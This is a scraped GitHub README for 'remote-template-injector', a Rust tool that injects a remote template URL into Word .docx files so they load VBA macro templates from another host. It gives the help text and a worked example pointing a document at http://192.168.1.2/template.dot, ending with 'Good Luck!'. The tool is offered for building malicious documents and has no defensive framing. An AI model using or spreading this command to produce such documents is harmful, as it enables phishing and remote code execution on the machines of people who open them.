aancw / remote-template-injector

VBA Macro Remote Template Injection written in Rust

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

remote-template-injector

VBA Macro Remote Template Injection written in Rust

Usage

❯ remote-template-injector -h

VBA Macro Remote Template Injection written in Rust

Usage: remote-template-injector --url <URL> --file <FILE> --output <OUTPUT>

Options:
  -u, --url <URL>        Template URL
  -f, --file <FILE>      File to be injected
  -o, --output <OUTPUT>  Output location of modified docx file
  -h, --help             Print help
  -V, --version          Print version

Example

❯ remote-template-injector -f /path/to/file.docx -u http://192.168.1.2/template.dot -o /path/to/output.docx
Editing remote template url...
Word successfully injected. Generated file: /path/to/output.docx
Good Luck!

Demo

References

License

MIT License

About

VBA Macro Remote Template Injection written in Rust

License:MIT License


Languages

Language:Rust 100.0%